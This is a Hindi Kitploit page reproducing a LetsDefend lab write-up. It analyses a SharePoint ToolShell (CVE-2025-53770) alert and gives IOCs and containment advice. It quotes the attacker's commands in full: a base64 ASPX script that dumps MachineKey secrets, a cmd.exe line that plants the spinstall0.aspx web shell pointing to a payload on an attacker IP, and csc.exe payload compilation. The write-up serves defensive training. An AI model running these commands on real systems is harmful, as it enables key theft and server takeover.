Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell — CVE-2025-53770 (ToolShell) SharePoint ज़ीरो-डे शोषण का विस्तृत विवरण, जिसमें RCE विश्लेषण, MachineKey निष्कासन, पेलोड संकलन, वेब शेल तैनाती, और घटना प्रतिक्रिया रोकथाम चरण शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/michaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell
समझौता संकेतक (IOC) प्रबंधनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणमालवेयर विश्लेषणडिजिटल फोरेंसिकपेनिट्रेशन टेस्टिंगखतरा खुफियालर्निंग और शिक्षा

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
घटना प्रतिक्रिया
लैब और अभ्यास
GitHubmichaael01/letsdefend--soc-342-cve-2025-53770-sharepoint-exploit-toolshell

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

CVE-2025-53770 (ToolShell) SharePoint ज़ीरो-डे शोषण का विस्तृत विवरण, जिसमें RCE विश्लेषण, MachineKey निष्कासन, पेलोड संकलन, वेब शेल तैनाती, और घटना प्रतिक्रिया रोकथाम चरण शामिल हैं।

रिपॉजिटरी देखें
311 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

LetsDefend--SOC-342-CVE-2025-53770-SharePoint-Exploit-ToolShell

परिचय

मैंने LetsDefend लैब में ToolShell (CVE-2025-53770) नामक SharePoint ज़ीरो-डे का विश्लेषण किया। मैंने एक वास्तविक दुनिया के ज़ीरो-डे हमले की नकल की जहाँ एक दुर्भावनापूर्ण POST अनुरोध ने प्रमाणीकरण को बायपास किया, MachineKeySection कुंजियाँ चुराने के लिए PowerShell चलाया, payload.exe संकलित किया और एक वेब शेल (spinstall0.aspx) छोड़ा। मैंने सब कुछ लॉग किया, व्यवहार का विश्लेषण किया और होस्ट को कंटेन किया। यह README हमले की प्रक्रियाओं, हमले को रोकने के कदमों और सीखे गए सबक को कवर करता है।

लैब अवलोकन

  • प्लेटफ़ॉर्म: LetsDefend Cyber Range
  • लक्ष्य: SharePoint Server (SharePoint01)
  • CVE: CVE-2025-53770
  • उद्देश्य: RCE का विश्लेषण, डिटेक्शन और कंटेनमेंट का अभ्यास करना

उपयोग किए गए उपकरण:

  • Windows PowerShell
  • VirusTotal
  • AbuseIPDB
  • LetsDefend Log Management
  • LetsDefend Enpoint Security
  • Base64 Decoder
  • LetsDefend Threat Intel

अलर्ट

image

यह एक गंभीर अलर्ट और संदिग्ध गतिविधि है जिसने MS SharePoint के ToolPane.aspx को बड़े पेलोड और स्पूफ़ किए गए Referer के साथ लक्षित किया। CVE संदर्भ CVE-2025-53770 से जुड़ा हुआ है। यह SharePoint की एक गंभीर भेद्यता है जिसका शोषण विशेष रूप से तैयार किए गए POST अनुरोध के माध्यम से किया जाता है, जिसने बिना प्रमाणीकरण वाले हमलावरों को अनुमति दी। सफल शोषण के परिणामस्वरूप सर्वर पर रिमोट कोड एक्सीक्यूशन (RCE) हुआ। मैंने इसे सक्रिय, उच्च-आपातकालीन स्थिति के रूप में माना और जब तक अन्यथा साबित न हो, संभावित सफल समझौता माना।

SharePoint का संक्षिप्त अर्थ

Microsoft SharePoint उद्यम सहयोग और दस्तावेज़ प्रबंधन के लिए एक प्लेटफ़ॉर्म है — अनिवार्य रूप से फ़ाइलों, वर्कफ़्लो और आंतरिक वेब ऐप्स के लिए एक सुरक्षित, संगठित केंद्र।

मुख्य उपयोग

  • दस्तावेज़ प्रबंधन: संस्करण नियंत्रण, ऑडिट ट्रेल और फ़ाइल अनुमतियाँ

  • सहयोग: कई उपयोगकर्ता एक साथ संपादित कर सकते हैं और दस्तावेज़ साझा कर सकते हैं

  • इंट्रानेट / पोर्टल: आंतरिक समाचार, HR नीतियाँ, डैशबोर्ड

  • वर्कफ़्लो और स्वचालन: फ़ॉर्म, अनुमोदन और सूचनाएँ

  • एकीकरण: Teams, Outlook, Office ऐप्स और Power BI से कनेक्ट होता है

SharePoint सुरक्षा संबंधी विचार

  • प्रमाणीकरण के लिए Active Directory या SSO का उपयोग करता है

  • डेटा आराम की स्थिति (at rest) और ट्रांज़िट में एन्क्रिप्टेड होता है

  • गलत कॉन्फ़िगरेशन होने पर वेब पार्ट्स और लेआउट का दुरुपयोग हो सकता है

  • ज़ीरो-डे शोषण से बचाव के लिए नियमित पैचिंग महत्वपूर्ण है

CVE-2025-53770 (ToolShell) क्या है

Microsoft SharePoint Server में एक गंभीर ज़ीरो-डे जो हमलावरों को बिना प्रमाणीकरण के दूरस्थ रूप से कोड चलाने की अनुमति देता है। यह असुरक्षित डी-सीरियलाइज़ेशन का दुरुपयोग करता है और पूर्ण सिस्टम अधिग्रहण के लिए अक्सर अन्य SharePoint कमज़ोरियों (CVE-2025-49704, CVE-2025-49706) के साथ चेन किया जाता है। CVSS 9.8 (गंभीर) रेटेड और जंगल में सक्रिय रूप से शोषित।

VirusTotal के साथ हमले का विश्लेषण

मैंने प्रेषक के IP पते (Source IP Address) का विश्लेषण VirusTotal के साथ किया स्रोत IP पता: 107.191.58.76 image

इससे मैं देख सकता हूँ कि 15/95 सुरक्षा विक्रेताओं ने इस IP पते को दुर्भावनापूर्ण के रूप में चिह्नित किया है, जो पहले से ही इस IP के बारे में बहुत कुछ कहता है।

IP स्थान

अब मुझे IP का स्थान खोजना है। यह AbuseIPDB की सहायता से किया गया और जैसा नीचे दिखाया गया है, यह IP हैकिंग, ब्रूट-फोर्स, वेब ऐप हमले, पोर्ट स्कैन, DNS पॉइज़निंग के लिए जाना जाता है।

image

एंडपॉइंट विश्लेषण

इसे हल करने वाले एक SOC विश्लेषक के रूप में, उठाया जाने वाला एक महत्वपूर्ण कदम एंडपॉइंट विश्लेषण है। मैंने आगे के विश्लेषण के लिए एंडपॉइंट सुरक्षा पर 'SharePoint01' नाम से होस्ट की खोज की, और यह IP हैकिंग के लिए जाना जाता है।

image

होस्ट का पता लगाने के बाद, मैंने कमांड लाइन की जाँच करने के लिए टर्मिनल इतिहास देखा

image

| टर्मिनल इतिहास कमांड लाइन

PCVAIEltcG9ydCBOYW1lc3BhY2U9IlN5c3RlbS5EaWFnbm9zdGljcyIgJT4NCjwlQCBJbXBvcnQgTmFtZXNwYWNlPSJTeXN0ZW0uSU8iICU+DQo8c2NyaXB0IHJ1bmF0PSJzZXJ2ZXIiIGxhbmd1YWdlPSJjIyIgQ09ERVBBR0U9IjY1MDAxIj4NCiAgICBwdWJsaWMgdm9pZCBQYWdlX2xvYWQoKQ0KICAgIHsNCgkJdmFyIHN5ID0gU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHkuTG9hZCgiU3lzdGVtLldlYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EiKTsNCiAgICAgICAgdmFyIG1rdCA9IHN5LkdldFR5cGUoIlN5c3RlbS5XZWIuQ29uZmlndXJhdGlvbi5NYWNoaW5lS2V5U2VjdGlvbiIpOw0KICAgICAgICB2YXIgZ2FjID0gbWt0LkdldE1ldGhvZCgiR2V0QXBwbGljYXRpb25Db25maWciLCBTeXN0ZW0uUmVmbGVjdGlvbi5CaW5kaW5nRmxhZ3MuU3RhdGljIHwgU3lzdGVtLlJlZmxlY3Rpb24uQmluZGluZ0ZsYWdzLk5vblB1YmxpYyk7DQogICAgICAgIHZhciBjZyA9IChTeXN0ZW0uV2ViLkNvbmZpZ3VyYXRpb24uTWFjaGluZUtleVNlY3Rpb24pZ2FjLkludm9rZShudWxsLCBuZXcgb2JqZWN0WzBdKTsNCiAgICAgICAgUmVzcG9uc2UuV3JpdGUoY2cuVmFsaWRhdGlvbktleSsifCIrY2cuVmFsaWRhdGlvbisifCIrY2cuRGVjcnlwdGlvbktleSsifCIrY2cuRGVjcnlwdGlvbisifCIrY2cuQ29tcGF0aWJpbGl0eU1vZGUpOw0KICAgIH0NCjwvc2NyaXB0Pg==

PowerShell फ़्लैग: -nop -w hidden -e

  • -nop = No profile (प्रोफ़ाइल स्क्रिप्ट से बचने के लिए)
  • -w hidden = विंडो को छिपाकर शुरू करें (स्टील्थ)
  • -e = एन्कोडेड कमांड

Base64 डिकोडर के साथ कमांड लाइन निष्कर्ष:

पेलोड के कारण, मैंने नीचे दिखाए अनुसार कमांड को डिकोड करने के लिए Base64 डिकोडर का उपयोग किया

image

उपयोगकर्ता ने सिस्टम निर्देशिका “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” से PowerShell लॉन्च किया और एन्कोडेड कमांड के साथ ASP.NET सर्वर-साइड C# स्क्रिप्ट चलाई।

  • System.Web असेंबली को लोड करने के लिए रिफ्लेक्शन का उपयोग करता है,
  • गैर-सार्वजनिक MachineKeySection तक पहुँचता है और एक गैर-सार्वजनिक विधि (GetApplicationConfig) को कॉल करता है,
  • वेब एप्लिकेशन के MachineKey मान (ValidationKey, DecryptionKey, आदि) पढ़ता है,
  • उन कुंजियों को HTTP प्रतिक्रिया में लिखता है (अर्थात, उन्हें बाहर निकालता है)।

पेलोड कैप्चर करना और पोस्ट-एक्सप्लॉइटेशन गतिविधियाँ: / _layouts/15/ToolPane.aspx?...

पेलोड होस्ट के लिए ASP.NET MachineKey को पढ़ने और लीक करने का प्रयास करता है — एक गुप्त कुंजी जिसका उपयोग ViewState/डी-सीरियलाइज़ेशन टोकन जाली बनाने और प्रमाणीकरण बायपास तथा रिमोट कोड एक्सीक्यूशन सक्षम करने के लिए किया जा सकता है। यह ToolShell शोषण पैटर्न (MachineKey का दुरुपयोग) से मेल खाता है। Base64 डिकोड और एनकोड के उपयोग से कमांड में समझौते के प्रमुख संकेतक (IoCs):

  • POST + बड़ा पेलोड + यह एन्कोडेड कमांड इंगित करता है कि हमलावर ने संभवतः ToolShell शोषण पथ के माध्यम से ऐसी सर्वर-साइड स्क्रिप्ट बनाने या चलाने का प्रयास किया।
  • मशीन एक्सपोज़र और अलर्ट ट्रिगर हुआ: -encodedCommand + छिपी हुई विंडो + base64 पेलोड का उपयोग चोरी-छिपे (evasion) और स्वचालित शोषण को इंगित करता है। हमलावर अक्सर पेलोड छिपाने और डिटेक्शन/कमांडलाइन लॉगिंग पैटर्न से बचने के लिए -encodedCommand का उपयोग करते हैं। यह हमलावर को दुर्भावनापूर्ण View State या सीरियलाइज़्ड पेलोड बनाने की अनुमति देता है जिसे एप्लिकेशन वैध मानकर स्वीकार कर लेता है, जिससे कमजोर SharePoint इंस्टेंस पर प्रमाणीकरण बायपास और रिमोट कोड एक्सीक्यूशन सक्षम होता है। ToolShell (CVE-2025-53770) के लिए, यह ठीक वही शोषण श्रृंखला है।

CMD निष्पादन और शोषण

हमलावर ने निजी कॉन्फ़िगरेशन तक पहुँचने का प्रयास किया और इसका शोषण करने का लक्ष्य रखा, इसलिए .NET का दुरुपयोग किया। Base64 डिकोडर से हम System.Web.Configuration.MachineKeySection और GetApplicationConfig देख सकते हैं: MachineKeySection में शामिल है:

  • मशीन/ऐप का ValidationKey
  • मशीन/ऐप का DecryptionKey

ये कुंजियाँ व्यूस्टेट (ViewState) और फ़ॉर्म प्रमाणीकरण की सुरक्षा के लिए उपयोग की जाने वाली गुप्त कुंजियाँ हैं। इन्हें प्राप्त करना सीरियलाइज़्ड ASP.NET पेलोड को जाली बनाने/मान्य करने की अनुमति देने वाली सामग्री प्राप्त करने का सीधा प्रयास है → डी-सीरियलाइज़ेशन-आधारित RCE के लिए प्रत्यक्ष पूर्व-शर्त।

CMD कमांड निष्कर्ष:

जैसा ऊपर दिखाया गया है, ठीक तीन सेकंड बाद, हमलावर ने एक और कमांड भेजा

image

| टर्मिनल इतिहास कमांड लाइन

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs.

निष्कर्ष

  • कमांड एक C# कंपाइलर (csc.exe) दिखाता है जो .NET फ्रेमवर्क के साथ आता है। इसका काम स्रोत कोड (.cs फ़ाइलें) लेना और उसे .NET असेंबली में संकलित करना है, आमतौर पर .exe या .dll।
  • हमलावर ने पीड़ित होस्ट पर एक C# स्रोत फ़ाइल (payload.cs) अपलोड या बनाई, फिर इसे Windows एक्ज़ीक्यूटेबल (payload.exe) में संकलित करने के लिए अंतर्निहित .NET कंपाइलर (csc.exe) का उपयोग किया। यह पेलोड मैलवेयर हो सकता है।

एक और CMD कमांड निष्कर्ष:

जैसा ऊपर दिखाया गया है, ठीक दो सेकंड बाद, हमलावर ने एक और कमांड भेजा

image

| टर्मिनल इतिहास कमांड लाइन

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs."C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx.

निष्कर्ष

  • हमलावर ने उस पथ में एक HTML फ़ॉर्म/ऑब्जेक्ट इको करके SharePoint की LAYOUTS निर्देशिका के अंदर एक नई ASPX फ़ाइल (spinstall0.aspx) बनाने के लिए cmd.exe का उपयोग किया।
  • इंजेक्ट की गई ASPX में Url="http://107.191.58.76/payload.exe" वाला एक शामिल है, जो सर्वर या किसी विज़िटर को उस रिमोट पेलोड की ओर निर्देशित करता है।
  • फ़ाइल को ...\TEMPLATE\LAYOUTS\ के अंतर्गत रखने से यह SharePoint वेब एप्लिकेशन के माध्यम से उपलब्ध हो जाती है (एक स्थायी वेब-सुलभ बैकडोर/ड्रॉपर)।
  • यह हमलावर-नियंत्रित होस्ट (107.191.58.76) से payload.exe की रिमोट डिलीवरी/निष्पादन के प्रयास को इंगित करता है और समझौते तथा स्थायित्व (persistence) खतरे का स्पष्ट संकेत है।
  • एक और CMD कमांड निष्कर्ष:

    जैसा ऊपर दिखाया गया है, ठीक पाँच सेकंड बाद, हमलावर ने एक और कमांड भेजा

    image

    | टर्मिनल इतिहास कमांड लाइन

    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command"[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

    निष्कर्ष

    • एप्लिकेशन की MachineKey कॉन्फ़िगरेशन को पढ़ने वाले System.Web.Configuration.MachineKeySection.GetApplicationConfig() को कॉल करने के लिए फिर से PowerShell निष्पादित किया।
    • यह ViewState और ऑथ टोकन को साइन/एन्क्रिप्ट करने के लिए उपयोग किए जाने वाले ValidationKey/DecryptionKey को पुनः प्राप्त करता है — ऐसी सामग्री जिसका उपयोग हमलावर सीरियलाइज़्ड पेलोड जाली बनाने और प्रमाणीकरण बायपास करने के लिए कर सकता है।
    • यह ToolShell-शैली की शोषण श्रृंखला (RCE की तैयारी) में एक स्पष्ट, सुसंगत टोही/एक्सफ़िल्ट्रेशन कदम है जिसे मैन्युअल रूप से लागू किया गया था।

    ये गतिविधियाँ एक सुसंगत पैटर्न दिखाती हैं और मैं इसे उच्च-विश्वास के साथ समझौता किया हुआ मानूँगा और तुरंत फोरेंसिक आर्टिफैक्ट एकत्र करूँगा।

    थ्रेट इंटेल

    सभी कमांड और निष्कर्ष एकत्र करने के बाद, मैंने थ्रेट इंटेल में आगे शोध किया और डेटा प्रकार IP द्वारा खोज की। डेटा स्रोत OnlyHunt और TAG CVE-2025-53770 दिखाता है और अलर्ट जाँच चैनल के लिए Referer: /_layouts/SignOut.aspx के साथ यह दर्शाता है कि यह एक वैध SharePoint था जिसे स्पूफ़ किया गया या उपयोग किया गया और बाद में SharePoint से साइन आउट कर दिया गया ताकि ऐसा प्रतीत हो कि यह एक सामान्य SharePoint क्रिया से उत्पन्न हुआ है। उस बिंदु पर, मैंने होस्ट को कंटेन कर लिया।

    image

    IOC (आर्टिफैक्ट)

    • IP 107.191.58.76: हमलावर का स्रोत IP जो शोषण POST भेजते हुए देखा गया
    • /_layouts/15/ToolPane.aspx?DisplayMode=Edit: प्रकार "url". POST द्वारा लक्षित शोषण एंडपॉइंट
    • Spinstall0.aspx: प्रकार "filename". तैनात दुर्भावनापूर्ण ASPX बैकडोर फ़ाइलनाम
    • MachineKeySection: प्रकार "string". MachineKey एक्सफ़िल्ट्रेशन का संकेत देने वाली ASPX कोड स्ट्रिंग

    मेरा विश्लेषण नोट और सारांश

    विश्लेषक नोट — SOC342 (CVE-2025-53770 / ToolShell) — SharePoint01

    दिनांक/समय: 2025-07-2213:07 (घटना) विश्लेषक: [YourName] केस आईडी: SOC342 होस्ट: SharePoint01 गंभीरता: गंभीर

    सारांश

    मैंने 2025-07-22 13:07 पर ToolShell (CVE-2025-53770) नामक एक गंभीर ज़ीरो-डे भेद्यता शोषण प्रयास देखा, जो SharePoint01 होस्टनाम वाले ऑन-प्रिमाइसेस SharePoint Server में हुआ। हमलावर ने, एक ज्ञात दुर्भावनापूर्ण IP (107.191.58.76) से — जो POST का स्रोत और पेलोड होस्ट है — प्रमाणीकरण को बायपास करके सर्वर पर रिमोट कोड चलाया। हमलावर ने SharePoint LAYOUTS निर्देशिका में spinstall0.aspx अपलोड/बनाई और ASP.NET MachineKey सामग्री पढ़ने तथा csc.exe के माध्यम से C# पेलोड संकलित करने के लिए PowerShell निष्पादित किया। इस प्रकार, उन्हें विश्वसनीय पेलोड तैयार करने की अनुमति मिली। यह गतिविधि SharePoint में spinstall0.aspx के साथ वेब-शेल तैनाती, MachineKey एक्सफ़िल्ट्रेशन और होस्ट-पर पेलोड संकलन के अनुरूप है — ये सभी समझौते के उच्च-विश्वास वाले संकेतक हैं।

    मेरे प्लेबुक विश्लेषक नोट को अपडेट करना

    image image

    हमलावर की गतिविधियों को रोकने के लिए अनुशंसित कदम:

    समझौते का पता लगाने के बाद, मैंने विश्लेषक नोट में निम्नलिखित कदम उठाने की अनुशंसा की:

    1. कंटेन: यदि अधिकृत हो, तो SharePoint01 को नेटवर्क से अलग करें; यदि नहीं, तो आउटबाउंड एग्रेस प्रतिबंध बनाए रखें और हमलावर IP/क्लस्टर को ब्लॉक करें।
    2. हंट: सभी SharePoint की खोज करें और पर्याप्त बैकअप सुनिश्चित करें
    3. उन्मूलन: पुष्टि किए गए दुर्भावनापूर्ण फ़ाइलों और किसी भी अनधिकृत शेड्यूल किए गए कार्य/सेवाओं को हटाएँ; अतिरिक्त स्थायित्व के लिए निरीक्षण करें।
    4. शमन: ASP.NET/MachineKey मानों को रोटेट करें और सभी ऑन-प्रिम SharePoint इंस्टेंस पर Microsoft जुलाई 2025 आपातकालीन पैच लागू करें। रोटेशन का समन्वय एप्लिकेशन स्वामियों के साथ करें।
    5. पहचान और रोकथाम: डिटेक्शन नियम तैनात/जोड़ें और समान गतिविधि के लिए पूरे वातावरण में हंट करें।
टूल डाउनलोड करें